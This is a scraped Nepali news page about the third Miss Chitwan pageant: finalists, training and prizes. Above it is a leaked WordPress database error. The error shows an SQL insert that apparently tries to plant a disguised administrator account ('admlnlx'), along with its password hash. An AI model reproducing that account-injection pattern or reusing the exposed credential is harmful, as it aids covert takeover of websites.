WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BouJGmhIhIRhlZMvYh1LTzMJP.2Pjp0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 20:31:36', '', 'admlnlx', 'admlnlx')
चितवन, माघ २९–
तीन वर्षपछि मिस चितवन–२०१७ हुने भएको छ । आयोजक ब्राइट नेपालले आज नारायणगढमा पत्रकार सम्मेलन गरि मिस चितवनको तेस्रो संस्करण बारे जानकारी दिएको हो ।
सालिमार मिस चितवनको तेस्रो संस्करणको फाईनल प्रतिस्पर्धाका लागि अडिसनबाट ३१ युवतीलाई छनौट गरिएको छ । उनीहरुबीच चैत्रको पहिलो साता फाईनल प्रतिस्पर्धा हुने कार्यक्रम निर्देशक सुनिल कुमार श्रेष्ठले जानकारी दिए ।
मिस चितवनको अडिसन राउण्डमा ५० जना युवतीले सहभागिता जनाएका थिए । फाईनल प्रतिस्पर्धाका लागि छनौट भएका युवतीहरुलाई एक महिनासम्म नेतृत्व विकास, फिटनेस, आध्यात्मिक सम्बन्धि तालिम, जनचेतनामुलक कार्य, सामाजिक कार्यमा लगाईने छ । उनीहरुलाई कोरियोग्राफर सञ्जित श्रेष्ठले प्रशिक्षण दिनेछन् । सालिमार मिस चितवनको उपाधि विजेताले स्कुटि, म्युजिक भिडियोमा अभिनय गर्न अवसर पाउने, मिस नेपालमा वाईल्ड कार्ड मात्रै सिधै फाईनल प्रतिस्पर्धामा सहभागि जनाउने पाउने आयोजकले जनाएको छ ।